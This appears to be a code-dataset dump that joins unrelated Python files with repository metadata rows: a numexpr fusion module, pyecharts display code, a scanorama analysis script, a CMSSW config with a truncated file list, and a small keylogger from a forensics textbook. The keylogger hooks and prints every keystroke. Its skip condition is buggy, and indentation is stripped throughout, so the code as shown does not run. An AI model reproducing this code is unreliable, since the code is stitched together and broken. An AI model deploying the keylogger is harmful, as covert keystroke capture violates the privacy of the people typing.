# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
from itertools import count
try:
import numexpr as ne
NUMEXPR_INSTALLED = True
except ImportError:
ne = None
NUMEXPR_INSTALLED = False
import numpy as np
from ..operands import TensorFuse
from .. import arithmetic, reduction
from ..array_utils import as_same_device
from .core import TensorFuseChunkMixin
class TensorNeFuseChunk(TensorFuse, TensorFuseChunkMixin):
_op_type_ = None # no opcode, cannot be serialized
@classmethod
def execute(cls, ctx, op):
chunk = op.outputs[0]
inputs = as_same_device([ctx[c.key] for c in op.inputs], device=op.device)
counter = count()
# Unified the var names to V_0, V_1, ... for better cache hit.
key_to_var = defaultdict(lambda: f"V_{counter.__next__()}")
local_dict = {key_to_var[c.key]: i for c, i in zip(op.inputs, inputs)}
expr = _evaluate(chunk).format_map(key_to_var)
# The numexpr.evaluate is thread safe: https://github.com/pydata/numexpr/pull/200
try:
res = ne.evaluate(expr, local_dict=local_dict, global_dict={})
except Exception as e:
raise RuntimeError(
f"Failed to evaluate numexpr {repr(expr)} on local dict {local_dict}."
) from e
res = _maybe_keepdims(chunk, res)
if chunk.ndim == 0 and res.ndim == 1 and res.size == 0:
res = res.dtype.type(0)
ctx[chunk.key] = res
# execution part
NE_UNARYOP_TO_STRING = {
arithmetic.TensorNegative: "-",
arithmetic.TensorAbs: "abs",
arithmetic.TensorConj: "conj",
arithmetic.TensorExp: "exp",
arithmetic.TensorLog: "log",
arithmetic.TensorLog10: "log10",
arithmetic.TensorExpm1: "expm1",
arithmetic.TensorLog1p: "log1p",
arithmetic.TensorSqrt: "sqrt",
arithmetic.TensorSin: "sin",
arithmetic.TensorCos: "cos",
arithmetic.TensorTan: "tan",
arithmetic.TensorArcsin: "arcsin",
arithmetic.TensorArccos: "arccos",
arithmetic.TensorArctan: "arctan",
arithmetic.TensorSinh: "sinh",
arithmetic.TensorCosh: "cosh",
arithmetic.TensorTanh: "tanh",
arithmetic.TensorArcsinh: "arcsinh",
arithmetic.TensorArccosh: "arccosh",
arithmetic.TensorArctanh: "arctanh",
arithmetic.TensorFloor: "floor",
arithmetic.TensorCeil: "ceil",
arithmetic.TensorNot: "~",
}
NE_BINOP_TO_STRING = {
arithmetic.TensorAdd: "+",
arithmetic.TensorSubtract: "-",
arithmetic.TensorMultiply: "*",
arithmetic.TensorDivide: "/",
arithmetic.TensorMod: "%",
arithmetic.TensorPower: "**",
arithmetic.TensorLshift: "<<",
arithmetic.TensorRshift: ">>",
arithmetic.TensorEqual: "==",
arithmetic.TensorNotEqual: "!=",
arithmetic.TensorLessThan: "<",
arithmetic.TensorLessEqual: "<=",
arithmetic.TensorGreaterThan: ">",
arithmetic.TensorGreaterEqual: ">=",
arithmetic.TensorAnd: "and",
arithmetic.TensorOr: "or",
}
NE_TREE_OP_TO_STRING = {
arithmetic.TensorTreeAdd: "+",
arithmetic.TensorTreeMultiply: "*",
}
NE_REDUCTION_TO_STRING = {
reduction.TensorSum: "sum",
reduction.TensorProd: "prod",
reduction.TensorMax: "max",
reduction.TensorMin: "min",
}
class _Default(dict):
def __missing__(self, key):
return f"{{{key}}}"
def _handle_unary(chunk):
if len(chunk.inputs) != 1:
raise ValueError("unary operand inputs should be 1")
data = chunk.inputs[0]
unary_op = NE_UNARYOP_TO_STRING[type(chunk.op)]
return f"{unary_op}({{{data.key}}})"
def _decompose(chunk):
expr = f"{{{chunk.key}}}"
for node in reversed(chunk.composed):
_expr = _evaluate(node)
expr = expr.format_map(_Default([(node.key, f"({_expr})")]))
return expr
def _handle_bin(chunk):
op = chunk.op
lhs = str(op.lhs) if np.isscalar(op.lhs) else f"{{{op.lhs.key}}}"
rhs = str(op.rhs) if np.isscalar(op.rhs) else f"{{{op.rhs.key}}}"
reverse = getattr(op, "reverse", False)
op = NE_BINOP_TO_STRING[type(op)]
if reverse:
exprs = [rhs, lhs]
else:
exprs = [lhs, rhs]
return op.join(exprs)
def _handle_tree(chunk):
op = NE_TREE_OP_TO_STRING[type(chunk.op)]
return op.join(f"{{{c.key}}}" for c in chunk.inputs)
def _wrap_bool(data):
if data.dtype == np.bool_:
return f"where({{{data.key}}}, 1, 0)"
return f"{{{data.key}}}"
def _handle_reduction(chunk):
ax = chunk.op.axis
data = chunk.inputs[0]
op_str = NE_REDUCTION_TO_STRING[type(chunk.op)]
# TODO(hks): delete it if numexpr.sum fixed
if len(ax) == data.ndim:
return f"{op_str}({_wrap_bool(data)})"
elif len(ax) == 1:
return f"{op_str}({_wrap_bool(data)},axis={ax[0]})"
else:
raise ValueError("numexpr cannot encode axis")
def _evaluate(chunk):
op_type = type(chunk.op)
if op_type in NE_UNARYOP_TO_STRING:
return _handle_unary(chunk)
elif op_type in NE_BINOP_TO_STRING:
return _handle_bin(chunk)
elif op_type in NE_TREE_OP_TO_STRING:
return _handle_tree(chunk)
elif op_type in NE_REDUCTION_TO_STRING:
return _handle_reduction(chunk)
elif op_type is TensorNeFuseChunk:
return _decompose(chunk)
else:
raise TypeError(f"unsupported operator in numexpr: {op_type.__name__}")
def _maybe_keepdims(chunk, res):
out_chunk = chunk.composed[-1] if type(chunk.op) == TensorNeFuseChunk else chunk
if type(out_chunk.op) in NE_REDUCTION_TO_STRING and out_chunk.op.keepdims:
res = np.reshape(res, out_chunk.shape)
return res
|
6bc8b1f6a8962e3ace644225156bc9a80829948d
|
3ccb023412acb22646d0132e25c41720e1522e1f
|
/Chapter 10/simple_keylogger.py
|
ae3eea636293f0561d9fb94e6a7a87e58a477dd7
|
[] |
no_license
|
PacktPublishing/Learning-Python-for-Forensics
|
dfecefcb686d5b1acdb861f2832b2a0edffaf140
|
4ca1e5601e7672f5b80d6109bafff81b6c359f49
|
refs/heads/master
| 2023-02-06T17:15:50.186542
| 2023-01-30T08:32:59
| 2023-01-30T08:32:59
| 60,173,644
| 104
| 56
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 654
|
py
|
simple_keylogger.py
|
import pythoncom,pyHook
def OnKeyboardEvent(event):
"""
Process keyboard event
"""
if event.Ascii != 0 or event.Ascii != 8: # Skip Null & Backspace
if event.Ascii == 13: # Handles a 'Enter' key press
keylogs = '<return>'
else:
keylogs = chr(event.Ascii)
print keylogs,
# Create a hook manager object
hm=pyHook.HookManager()
try:
# Set funciton for keystroke processing
hm.KeyDown = OnKeyboardEvent
except (TypeError, KeyboardInterrupt):
pass # Allow us to ignore errors that may cause the code exit
# Set the hook
hm.HookKeyboard()
# Wait forever
pythoncom.PumpMessages()
|
c9749bc4cecf9be0ba723e814e459eb93c35130f
|
458518b66f3628f9e80d98aa718dec7bb1bc79a7
|
/pyecharts/render/display.py
|
78c93e2a084c6eeef0dd40b6a8348598fff81351
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
pyecharts/pyecharts
|
e40f4829f6edeb85f76008cebbc5a1557f35db19
|
f92c839a51d3878eeb24504ad191706c9db2c2ed
|
refs/heads/master
| 2023-09-01T07:32:21.285521
| 2023-08-21T03:59:26
| 2023-08-21T03:59:26
| 95,067,884
| 12,973
| 2,786
|
MIT
| 2023-08-25T05:44:08
| 2017-06-22T02:50:25
|
Python
|
UTF-8
|
Python
| false
| false
| 2,364
|
py
|
display.py
|
from ..types import Optional, Sequence, Union
from urllib.parse import urlparse
import http.client
class HTML:
def __init__(self, data: Optional[str] = None):
self.data = data
def _repr_html_(self):
return self.data
def __html__(self):
return self._repr_html_()
_lib_t1 = """new Promise(function(resolve, reject) {
var script = document.createElement("script");
script.onload = resolve;
script.onerror = reject;
script.src = "%s";
document.head.appendChild(script);
}).then(() => {
"""
_lib_t2 = """
});"""
_css_t = """var link = document.createElement("link");
link.ref = "stylesheet";
link.type = "text/css";
link.href = "%s";
document.head.appendChild(link);
"""
class Javascript:
def __init__(
self,
data: Optional[str] = None,
lib: Optional[Union[str, Sequence]] = None,
css: Optional[Union[str, Sequence]] = None,
):
if isinstance(lib, str):
lib = [lib]
elif lib is None:
lib = []
if isinstance(css, str):
css = [css]
elif css is None:
css = []
self.lib = lib
self.css = css
self.data = data or ""
self.javascript_contents = dict()
def _repr_javascript_(self):
r = ""
for c in self.css:
r += _css_t % c
for d in self.lib:
r += _lib_t1 % d
r += self.data
r += _lib_t2 * len(self.lib)
return r
def load_javascript_contents(self):
for lib in self.lib:
parsed_url = urlparse(lib)
host: str = str(parsed_url.hostname)
port: int = parsed_url.port
path: str = parsed_url.path
resp: Optional[http.client.HTTPResponse] = None
try:
conn = http.client.HTTPSConnection(host, port)
conn.request("GET", path)
resp = conn.getresponse()
if resp.status != 200:
raise RuntimeError("Cannot load JavaScript lib: %s" % lib)
self.javascript_contents[lib] = resp.read().decode("utf-8")
finally:
if resp is not None:
resp.close()
return self
|
0401bfbc6e5aa7085c7c88ac9ed3f5061fc49cad
|
512cc7446bfc05b392ba7e697d316eb00c620c01
|
/bin/fly_brain.py
|
495ec2a448a4ee484f924e895f6f32f2c05e72da
|
[
"MIT"
] |
permissive
|
brianhie/scanorama
|
b4ce1c947b097a5098850aeafa92cb0126791ad1
|
3fbff622d8c6c0122e699e2e72e9ab4e2a531c7f
|
refs/heads/master
| 2022-12-13T05:23:11.764455
| 2022-11-28T18:50:30
| 2022-11-28T18:50:30
| 141,593,152
| 228
| 47
|
MIT
| 2022-11-28T18:48:41
| 2018-07-19T14:43:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,277
|
py
|
fly_brain.py
|
import numpy as np
from process import load_names, merge_datasets
from scanorama import process_data, find_alignments_table
from time_align import time_align_correlate, time_align_visualize, time_dist
NAMESPACE = 'fly_brain'
data_names = [
'data/fly_brain/DGRP-551_0d_rep1',
'data/fly_brain/DGRP-551_0d_rep2',
'data/fly_brain/DGRP-551_1d_rep1',
'data/fly_brain/DGRP-551_3d_rep1',
'data/fly_brain/DGRP-551_6d_rep1',
'data/fly_brain/DGRP-551_6d_rep2',
'data/fly_brain/DGRP-551_9d_rep1',
'data/fly_brain/DGRP-551_15d_rep1',
'data/fly_brain/DGRP-551_30d_rep1',
'data/fly_brain/DGRP-551_30d_rep2',
'data/fly_brain/DGRP-551_50d_rep1',
]
if __name__ == '__main__':
datasets, genes_list, n_cells = load_names(data_names)
datasets, genes = merge_datasets(datasets, genes_list)
datasets_dimred, genes = process_data(datasets, genes)
_, A, _ = find_alignments_table(datasets_dimred)
time = np.array([ 0, 0, 1, 3, 6, 6, 9, 15, 30, 30, 50 ]).reshape(-1, 1)
time_align_correlate(A, time)
time_dist(datasets_dimred, time)
x = np.array([ 0, 0, 1, 2, 3, 3, 4, 5, 6, 6, 7 ]).reshape(-1, 1)
y = [ -.1, .1, 0, 0, -.1, .1, 0, 0, -.1, .1, 0 ]
time_align_visualize(A, x, y, namespace=NAMESPACE)
|
1576c12531b724098b4938bab203ebc568d50b66
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/L1Trigger/GlobalTriggerAnalyzer/test/L1GtDataFromRawEmulAnalyzer_cfg.py
|
3133a9cb55093a07539170a5586f678e56c045e1
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 73,723
|
py
|
L1GtDataFromRawEmulAnalyzer_cfg.py
|
#
# cfg file for:
#
# Unpack the GCT, GMT and GT data.
# Run the L1 GT emulator on the unpacked GCT and GMT data.
# Compare the GT data records with the GT emulated records
#
import FWCore.ParameterSet.Config as cms
process = cms.Process("RunL1GtDataFromRawEmulAnalyzer")
# number of events and source
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(5000)
)
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:/afs/cern.ch/user/g/ghete/scratch0/CmsswTestFiles/testGt_DataFromRawEmulAnalyzer_source.root')
)
process.PoolSource.fileNames = ['/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/003AD0A3-B51C-DD11-834F-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/020DA07C-9C1C-DD11-8B5C-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/026FFDE2-B71C-DD11-9D4A-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/028925DF-A61C-DD11-BDF1-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0401CDA0-A01C-DD11-9BDB-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0414D38E-9E1C-DD11-A7E5-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/04F62EBD-B91C-DD11-BB9C-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0696D1C9-A41C-DD11-A411-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A052134-AF1C-DD11-8919-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A60D7DC-A41C-DD11-9075-001617E30CA4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A637587-B31C-DD11-B32A-000423D996C8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A71AABE-A21C-DD11-A9A1-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C3D3FB1-B11C-DD11-9B38-000423D992DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C4A72B9-B91C-DD11-8A6F-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C60F77C-9C1C-DD11-BC75-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C87A74D-9A1C-DD11-A29B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0E34B872-9C1C-DD11-8208-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0E8A89B0-B91C-DD11-8EBA-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0EF363E9-A61C-DD11-B75F-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/105F2C89-9E1C-DD11-9D86-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1211D927-B81C-DD11-91B3-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/121EDD5E-B11C-DD11-AEDE-001D09F23E53.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/12464707-A91C-DD11-B478-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/127649CF-A41C-DD11-B170-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/146566AE-B71C-DD11-A113-001617DC1F70.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1483D99C-B51C-DD11-9274-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/148AB865-B11C-DD11-8B3F-001D09F24E39.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14B76514-AB1C-DD11-BEFA-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14E55CBD-B91C-DD11-A876-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14F7A391-A01C-DD11-9D9E-001617DC1F70.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1607D3A0-A01C-DD11-9223-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/16673A21-B81C-DD11-8D6F-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/18096B2D-AF1C-DD11-A2A2-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/189AC9C5-A41C-DD11-868A-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1A9B278C-A01C-DD11-842F-000423D6CAF2.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1AD12186-9E1C-DD11-815A-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1C240A80-9E1C-DD11-99DD-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1C7DCBDA-A61C-DD11-BFCA-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1E24F97C-9C1C-DD11-8921-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1E9EE338-9A1C-DD11-987A-000423D6A6F4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2021DDD2-A41C-DD11-AAF1-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2064C823-AD1C-DD11-B86F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/20675D3E-AF1C-DD11-B97D-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2072E22E-981C-DD11-B7A0-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/209E2E2B-AB1C-DD11-8B0F-000423DC1A0C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/20DFF4BD-A21C-DD11-AAE4-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2201A985-9E1C-DD11-B808-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/22718B76-9C1C-DD11-95E1-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/228D717C-9E1C-DD11-B614-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/22B6FAD7-A41C-DD11-9238-001617DF785A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/242FCD06-AB1C-DD11-8213-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2445DE33-981C-DD11-A43B-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/26B69B96-A01C-DD11-8FC4-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2812BEEF-B71C-DD11-8F46-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2A2CCCA0-A01C-DD11-93B9-001617DBD556.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2A59E006-A91C-DD11-A82B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2AB8E6D7-A41C-DD11-9CE5-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2C6D88A5-B51C-DD11-82E3-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2CA386B3-B91C-DD11-BDE5-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2E3E1A3E-9A1C-DD11-A7CE-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2E9DA8C2-B91C-DD11-8DE2-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32D12786-9E1C-DD11-847B-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32FB38BC-B91C-DD11-A8E5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32FD88CF-A41C-DD11-BB80-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3465F6A3-B71C-DD11-814D-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36588B7A-B11C-DD11-8EF1-001D09F24024.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/368E861F-B81C-DD11-B1B3-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36B9546B-B41C-DD11-9F3D-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36D22616-AB1C-DD11-BFCF-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/382BA240-AF1C-DD11-AF9F-000423D94C80.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3AA50549-9A1C-DD11-AABD-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3AD70FB4-A21C-DD11-8A63-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3ADAADE1-A61C-DD11-B2AA-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3C096D93-A01C-DD11-B602-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3C87B1E8-A61C-DD11-A4F2-000423D996C8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3CCC829C-A01C-DD11-ACDF-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3E22AFBB-A21C-DD11-AB9B-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3E7BB98C-A01C-DD11-91C0-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/400B2EDA-A61C-DD11-B40A-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/403705CF-A41C-DD11-A0CC-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/40A83AB4-B91C-DD11-9009-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/426D436B-9C1C-DD11-9397-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/42E7BF93-A01C-DD11-B183-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/42FFA897-A01C-DD11-BD31-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/442D1EDA-A41C-DD11-99E7-000423D6CAF2.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/44BA378D-A01C-DD11-A315-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/44BB2D77-9C1C-DD11-BB5A-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/462E23DA-A61C-DD11-8BB4-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48626E2D-AF1C-DD11-AC76-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48746689-9E1C-DD11-8636-0019DB29C5FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/487B3F93-A01C-DD11-9494-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4888D793-A01C-DD11-8015-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48C529D3-A41C-DD11-A339-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48CED0AD-B51C-DD11-90F8-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4A251384-9E1C-DD11-ABCC-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4CB2CE88-B31C-DD11-AFB6-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4CC3CE79-B11C-DD11-9EDA-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4EFE256E-9C1C-DD11-BB71-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/50F6304D-9A1C-DD11-B404-000423D985B0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/50F86B89-9E1C-DD11-A8AF-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52756844-9A1C-DD11-8D8D-001617DBCF90.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52E7ECA0-B51C-DD11-BB37-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52F22F7D-B31C-DD11-A927-000423D99660.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/54387CBD-A21C-DD11-948C-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5689BB7C-9C1C-DD11-814E-001617C3B706.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/569DD041-9A1C-DD11-998E-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/56A0A3E6-A61C-DD11-9903-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/584C9F03-A91C-DD11-B7CF-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/589FD448-9A1C-DD11-987B-001617C3B6DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/58D1F7BD-A21C-DD11-868A-001617E30D12.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/58FE98E6-A61C-DD11-8D9F-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5AC19AC4-A21C-DD11-9156-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5CC7329E-B51C-DD11-9263-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5E91438D-9E1C-DD11-84C5-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5EF53351-B81C-DD11-A03E-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/609D941F-AD1C-DD11-9C31-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/60D31125-B81C-DD11-BA96-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/60F55A71-9C1C-DD11-B2A5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/62815270-B31C-DD11-8D5F-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6286A3CE-A41C-DD11-B778-000423D6CA6E.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/628AC3E4-A61C-DD11-B825-000423D99658.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/628C32BE-A21C-DD11-BF26-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/64870171-9C1C-DD11-9446-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/64C37396-A01C-DD11-AC51-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66382D71-B31C-DD11-A1EC-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66A011A1-A01C-DD11-BB03-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66BF7047-9A1C-DD11-9E11-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66C6BFDF-A61C-DD11-B38A-000423D94C68.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/68CADF33-AF1C-DD11-B816-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/68F15475-B31C-DD11-9003-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6A447F52-B11C-DD11-ADF5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6A81039D-A01C-DD11-AB8C-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6ADDF69C-B51C-DD11-AACF-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6C22E3A6-A01C-DD11-BF27-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6C2A4D97-B11C-DD11-8199-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6CA70D49-9A1C-DD11-A02B-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6E3BEBE1-A61C-DD11-864F-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6EDB6407-A91C-DD11-B38D-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/701CC33D-9A1C-DD11-86A0-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/70D54482-B11C-DD11-8967-001D09F26C5C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/70FFC09B-B51C-DD11-B3E3-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/724E9A61-B11C-DD11-BD5E-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/72500CBD-B91C-DD11-9808-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/740C169F-B51C-DD11-B13D-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/740ECA5B-B11C-DD11-B2E9-001617C3B614.root',
